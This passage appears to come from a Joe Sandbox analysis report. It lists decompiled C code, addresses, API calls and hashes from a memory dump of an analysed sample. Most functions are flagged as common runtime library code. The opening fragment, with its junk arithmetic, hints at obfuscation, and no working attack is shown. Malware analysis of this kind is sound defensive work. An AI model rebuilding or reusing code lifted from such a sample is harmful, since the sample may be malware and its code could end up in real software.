				E00404905(0xfffffffffffffff9,  !( ~( !( !_t72 - 0x59) & 0x000000ce)), 0xe4, ( !(((0x0000002b * (_t79 + 2) & 0x00000011) * (_t68 + 1 - 1 + 0x37) + 0x3d) * _t39) * ((_t39 * _t39 >> 0x00000020) - 0x00000001) & 0x000000db) - 0xfc);
				return _a8;
			}













                                                                                                                                                                                                        0x0041905b
                                                                                                                                                                                                        0x00419060
                                                                                                                                                                                                        0x00419068
                                                                                                                                                                                                        0x00419073
                                                                                                                                                                                                        0x00419074
                                                                                                                                                                                                        0x00419080
                                                                                                                                                                                                        0x00419084
                                                                                                                                                                                                        0x0041908d
                                                                                                                                                                                                        0x00419090
                                                                                                                                                                                                        0x00419093
                                                                                                                                                                                                        0x0041909c
                                                                                                                                                                                                        0x004190aa
                                                                                                                                                                                                        0x004190ad
                                                                                                                                                                                                        0x004190b0
                                                                                                                                                                                                        0x004190be
                                                                                                                                                                                                        0x004190c1
                                                                                                                                                                                                        0x004190c3
                                                                                                                                                                                                        0x004190cf
                                                                                                                                                                                                        0x004190dc
                                                                                                                                                                                                        0x004190e1
                                                                                                                                                                                                        0x004190e9
                                                                                                                                                                                                        0x004190ef
                                                                                                                                                                                                        0x00419105
                                                                                                                                                                                                        0x00419118
                                                                                                                                                                                                        0x00419123
                                                                                                                                                                                                        0x00419129
                                                                                                                                                                                                        0x0041912a
                                                                                                                                                                                                        0x0041913b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001000), ref: 00419105
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 626452242-0
                                                                                                                                                                                                        • Opcode ID: 142393879d2a7b66c00bb39d92a0daf38e18b4e27b4d19f928142b433daea49a
                                                                                                                                                                                                        • Instruction ID: b5efc798a334217b311e5b23e25a7c5da2a586d6c86a5d752dc7cbb393c2376b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 142393879d2a7b66c00bb39d92a0daf38e18b4e27b4d19f928142b433daea49a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31214CB7A006086BE704C67DDC46BADBB55D7C9330F109721FA28DB3D4D6388E414781
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 0040F990 Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0040F990(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E004117D0(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E004117D0(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E004117D0(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E004117D0(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E004117D0(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E004117D0(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E004117D0(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E004117D0(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E004117D0(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E004117D0(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E004117D0(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E004117D0(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E004117D0(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E004117D0(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E004117D0(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E004117D0(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E004117D0(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E004117D0(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E004117D0(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E004117D0(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E004117D0(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E004117D0(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E004117D0(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E004117D0(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E004117D0(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E004117D0(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E004117D0(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E004117D0(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E004117D0(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E004117D0(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E004117D0(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E004117D0(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E004117D0(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E004117D0(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E004117D0(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E004117D0(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E004117D0(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E004117D0(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E004117D0(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E004117D0(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E004117D0(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E004117D0(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E004117D0(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E004117D0(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}




















































                                                                                                                                                                                                        0x0040f998
                                                                                                                                                                                                        0x0040f99c
                                                                                                                                                                                                        0x0040f9a0
                                                                                                                                                                                                        0x0040f9a3
                                                                                                                                                                                                        0x0040f9a8
                                                                                                                                                                                                        0x0040f9af
                                                                                                                                                                                                        0x0040f9b5
                                                                                                                                                                                                        0x0040f9c7
                                                                                                                                                                                                        0x0040f9dc
                                                                                                                                                                                                        0x0040f9f1
                                                                                                                                                                                                        0x0040fa06
                                                                                                                                                                                                        0x0040fa1e
                                                                                                                                                                                                        0x0040fa33
                                                                                                                                                                                                        0x0040fa45
                                                                                                                                                                                                        0x0040fa5a
                                                                                                                                                                                                        0x0040fa72
                                                                                                                                                                                                        0x0040fa87
                                                                                                                                                                                                        0x0040fa9c
                                                                                                                                                                                                        0x0040fab1
                                                                                                                                                                                                        0x0040fac9
                                                                                                                                                                                                        0x0040fade
                                                                                                                                                                                                        0x0040faf3
                                                                                                                                                                                                        0x0040fb08
                                                                                                                                                                                                        0x0040fb20
                                                                                                                                                                                                        0x0040fb35
                                                                                                                                                                                                        0x0040fb4a
                                                                                                                                                                                                        0x0040fb5f
                                                                                                                                                                                                        0x0040fb77
                                                                                                                                                                                                        0x0040fb8c
                                                                                                                                                                                                        0x0040fba1
                                                                                                                                                                                                        0x0040fbb6
                                                                                                                                                                                                        0x0040fbce
                                                                                                                                                                                                        0x0040fbe3
                                                                                                                                                                                                        0x0040fbf8
                                                                                                                                                                                                        0x0040fc0d
                                                                                                                                                                                                        0x0040fc25
                                                                                                                                                                                                        0x0040fc3a
                                                                                                                                                                                                        0x0040fc4f
                                                                                                                                                                                                        0x0040fc64
                                                                                                                                                                                                        0x0040fc7f
                                                                                                                                                                                                        0x0040fc97
                                                                                                                                                                                                        0x0040fcaf
                                                                                                                                                                                                        0x0040fcc7
                                                                                                                                                                                                        0x0040fce2
                                                                                                                                                                                                        0x0040fcfa
                                                                                                                                                                                                        0x0040fd12
                                                                                                                                                                                                        0x0040fd2a
                                                                                                                                                                                                        0x0040fd45
                                                                                                                                                                                                        0x0040fd5d
                                                                                                                                                                                                        0x0040fd78
                                                                                                                                                                                                        0x0040fd8b
                                                                                                                                                                                                        0x0040fd95
                                                                                                                                                                                                        0x0040fda2
                                                                                                                                                                                                        0x0040fdaa
                                                                                                                                                                                                        0x0040f9aa
                                                                                                                                                                                                        0x0040f9ae
                                                                                                                                                                                                        0x0040f9ae

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ___getlocaleinfo
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1937885557-0
                                                                                                                                                                                                        • Opcode ID: cd71842d4e99d40a02c7e0779aca8632662b8e4ceae5cd7a16824908425c8851
                                                                                                                                                                                                        • Instruction ID: 2dc00d7319210ed8a052a58aa979d3e3da7b24fb00a99161b3b7a16fadde738a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd71842d4e99d40a02c7e0779aca8632662b8e4ceae5cd7a16824908425c8851
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28E1DEB290020DBEEF12DBF28C41DFF77BDEB04788F14052BB21593591EA74AA459764
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00406CDA Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                                                        			E00406CDA(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4294d0; // 0x5210f904
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x42ae80 = _t6;
				 *0x42ae7c = _t22;
				 *0x42ae78 = _t25;
				 *0x42ae74 = _t21;
				 *0x42ae70 = _t27;
				 *0x42ae6c = _t26;
				 *0x42ae98 = ss;
				 *0x42ae8c = cs;
				 *0x42ae68 = ds;
				 *0x42ae64 = es;
				 *0x42ae60 = fs;
				 *0x42ae5c = gs;
				asm("pushfd");
				_pop( *0x42ae90);
				 *0x42ae84 =  *_t31;
				 *0x42ae88 = _v0;
				 *0x42ae94 =  &_a4;
				 *0x42add0 = 0x10001;
				_t11 =  *0x42ae88; // 0x0
				 *0x42ad84 = _t11;
				 *0x42ad78 = 0xc0000409;
				 *0x42ad7c = 1;
				_t12 =  *0x4294d0; // 0x5210f904
				_v812 = _t12;
				_t13 =  *0x4294d4; // 0xadef06fb
				_v808 = _t13;
				 *0x42adc8 = IsDebuggerPresent();
				_push(1);
				E0040BABC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x422c48);
				if( *0x42adc8 == 0) {
					_push(1);
					E0040BABC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                                                                        0x00406cda
                                                                                                                                                                                                        0x00406cda
                                                                                                                                                                                                        0x00406cda
                                                                                                                                                                                                        0x00406cda
                                                                                                                                                                                                        0x00406cda
                                                                                                                                                                                                        0x00406cda
                                                                                                                                                                                                        0x00406cda
                                                                                                                                                                                                        0x00406ce0
                                                                                                                                                                                                        0x00406ce2
                                                                                                                                                                                                        0x00406ce2
                                                                                                                                                                                                        0x0040e190
                                                                                                                                                                                                        0x0040e195
                                                                                                                                                                                                        0x0040e19b
                                                                                                                                                                                                        0x0040e1a1
                                                                                                                                                                                                        0x0040e1a7
                                                                                                                                                                                                        0x0040e1ad
                                                                                                                                                                                                        0x0040e1b3
                                                                                                                                                                                                        0x0040e1ba
                                                                                                                                                                                                        0x0040e1c1
                                                                                                                                                                                                        0x0040e1c8
                                                                                                                                                                                                        0x0040e1cf
                                                                                                                                                                                                        0x0040e1d6
                                                                                                                                                                                                        0x0040e1dd
                                                                                                                                                                                                        0x0040e1de
                                                                                                                                                                                                        0x0040e1e7
                                                                                                                                                                                                        0x0040e1ef
                                                                                                                                                                                                        0x0040e1f7
                                                                                                                                                                                                        0x0040e202
                                                                                                                                                                                                        0x0040e20c
                                                                                                                                                                                                        0x0040e211
                                                                                                                                                                                                        0x0040e216
                                                                                                                                                                                                        0x0040e220
                                                                                                                                                                                                        0x0040e22a
                                                                                                                                                                                                        0x0040e22f
                                                                                                                                                                                                        0x0040e235
                                                                                                                                                                                                        0x0040e23a
                                                                                                                                                                                                        0x0040e246
                                                                                                                                                                                                        0x0040e24b
                                                                                                                                                                                                        0x0040e24d
                                                                                                                                                                                                        0x0040e255
                                                                                                                                                                                                        0x0040e260
                                                                                                                                                                                                        0x0040e26d
                                                                                                                                                                                                        0x0040e26f
                                                                                                                                                                                                        0x0040e271
                                                                                                                                                                                                        0x0040e276
                                                                                                                                                                                                        0x0040e28a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0040E240
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040E255
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00422C48), ref: 0040E260
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0040E27C
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0040E283
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2579439406-0
                                                                                                                                                                                                        • Opcode ID: 2c160fe2d0bd155fe53703cdc8561db83c61f5e7d2f38b6c03a32e9dc59577ee
                                                                                                                                                                                                        • Instruction ID: b5f64f73f4b48003aa6180a0c0465cf0f21f2e2bac6e42e0dac37edd9f478c2f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c160fe2d0bd155fe53703cdc8561db83c61f5e7d2f38b6c03a32e9dc59577ee
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A21CDB5A903049FD720DF25ED45A443BA5FB58305FD6047AE809976B0E7B498A3CF0E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040B596 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E0040B596(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x424ff8);
				E0040D294(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0040C4DB(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x422bd0;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x429920;
				E0040D68E(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E0040B66B();
				E0040D68E(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x429610; // 0x20310f8
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E00408ABA( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0040D2D9(E0040B674());
			}








                                                                                                                                                                                                        0x0040b596
                                                                                                                                                                                                        0x0040b596
                                                                                                                                                                                                        0x0040b598
                                                                                                                                                                                                        0x0040b59d
                                                                                                                                                                                                        0x0040b5a2
                                                                                                                                                                                                        0x0040b5a8
                                                                                                                                                                                                        0x0040b5b0
                                                                                                                                                                                                        0x0040b5b3
                                                                                                                                                                                                        0x0040b5b8
                                                                                                                                                                                                        0x0040b5b9
                                                                                                                                                                                                        0x0040b5bc
                                                                                                                                                                                                        0x0040b5bf
                                                                                                                                                                                                        0x0040b5c9
                                                                                                                                                                                                        0x0040b5ce
                                                                                                                                                                                                        0x0040b5d6
                                                                                                                                                                                                        0x0040b5de
                                                                                                                                                                                                        0x0040b5ee
                                                                                                                                                                                                        0x0040b5ee
                                                                                                                                                                                                        0x0040b5f4
                                                                                                                                                                                                        0x0040b5f7
                                                                                                                                                                                                        0x0040b5fe
                                                                                                                                                                                                        0x0040b605
                                                                                                                                                                                                        0x0040b60e
                                                                                                                                                                                                        0x0040b614
                                                                                                                                                                                                        0x0040b61b
                                                                                                                                                                                                        0x0040b621
                                                                                                                                                                                                        0x0040b628
                                                                                                                                                                                                        0x0040b62f
                                                                                                                                                                                                        0x0040b635
                                                                                                                                                                                                        0x0040b638
                                                                                                                                                                                                        0x0040b63b
                                                                                                                                                                                                        0x0040b640
                                                                                                                                                                                                        0x0040b642
                                                                                                                                                                                                        0x0040b647
                                                                                                                                                                                                        0x0040b647
                                                                                                                                                                                                        0x0040b64d
                                                                                                                                                                                                        0x0040b653
                                                                                                                                                                                                        0x0040b664

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00424FF8,0000000C,0040B6D1,00000000,00000000,?,?,00409A29,00406CC3,?,0040121A,?,?), ref: 0040B5A8
                                                                                                                                                                                                        • __crt_waiting_on_module_handle.LIBCMT ref: 0040B5B3
                                                                                                                                                                                                          • Part of subcall function 0040C4DB: Sleep.KERNEL32(000003E8,00000000,?,0040B4F9,KERNEL32.DLL,?,0040B545,?,?,00409A29,00406CC3,?,0040121A,?,?), ref: 0040C4E7
                                                                                                                                                                                                          • Part of subcall function 0040C4DB: GetModuleHandleW.KERNEL32(00000010,?,0040B4F9,KERNEL32.DLL,?,0040B545,?,?,00409A29,00406CC3,?,0040121A,?,?), ref: 0040C4F0
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040B5DC
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040B5EC
                                                                                                                                                                                                        • __lock.LIBCMT ref: 0040B60E
                                                                                                                                                                                                        • InterlockedIncrement.KERNEL32(00429920), ref: 0040B61B
                                                                                                                                                                                                        • __lock.LIBCMT ref: 0040B62F
                                                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 0040B64D
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                                        • API String ID: 1028249917-2843748187
                                                                                                                                                                                                        • Opcode ID: 9c980524b17fc86cf85f711787712c9bf7a11e1b4ad13a4453ea5275dfae2e02
                                                                                                                                                                                                        • Instruction ID: 1304dc8a5914f9468177ce493641d3e66e8ae9b94de506574f4b097bf1d59058
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c980524b17fc86cf85f711787712c9bf7a11e1b4ad13a4453ea5275dfae2e02
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C311C371A40701EED7209F769901B4ABBE0EF04318F50896FE499A33E1CB789A41CF5D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041D720 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041D720(intOrPtr __ecx, signed int _a4, signed char _a8) {
				char _v44;
				char _v72;
				char _v112;
				char _v140;
				char _v180;
				char _v208;
				intOrPtr _v212;
				intOrPtr _t35;

				_v212 = __ecx;
				 *(_v212 + 8) = _a4 & 0x00000017;
				_t35 = _v212;
				if(( *(_v212 + 8) &  *(_t35 + 0xc)) != 0) {
					if((_a8 & 0x000000ff) == 0) {
						if(( *(_v212 + 8) &  *(_v212 + 0xc) & 0x00000004) == 0) {
							if(( *(_v212 + 8) &  *(_v212 + 0xc) & 0x00000002) == 0) {
								E00401030( &_v208, "ios_base::eofbit set");
								E0041D850( &_v180,  &_v208);
								E00404EFB( &_v180, 0x4246a0);
								return E00401070( &_v208);
							}
							E00401030( &_v140, "ios_base::failbit set");
							E0041D850( &_v112,  &_v140);
							E00404EFB( &_v112, 0x4246a0);
							return E00401070( &_v140);
						}
						E00401030( &_v72, "ios_base::badbit set");
						E0041D850( &_v44,  &_v72);
						E00404EFB( &_v44, 0x4246a0);
						return E00401070( &_v72);
					}
					return E00404EFB(0, 0);
				}
				return _t35;
			}











                                                                                                                                                                                                        0x0041d729
                                                                                                                                                                                                        0x0041d73b
                                                                                                                                                                                                        0x0041d744
                                                                                                                                                                                                        0x0041d750
                                                                                                                                                                                                        0x0041d75d
                                                                                                                                                                                                        0x0041d782
                                                                                                                                                                                                        0x0041d7cd
                                                                                                                                                                                                        0x0041d814
                                                                                                                                                                                                        0x0041d826
                                                                                                                                                                                                        0x0041d837
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041d842
                                                                                                                                                                                                        0x0041d7da
                                                                                                                                                                                                        0x0041d7e9
                                                                                                                                                                                                        0x0041d7f7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041d802
                                                                                                                                                                                                        0x0041d78c
                                                                                                                                                                                                        0x0041d798
                                                                                                                                                                                                        0x0041d7a6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041d7ae
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041d763
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0041D763
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
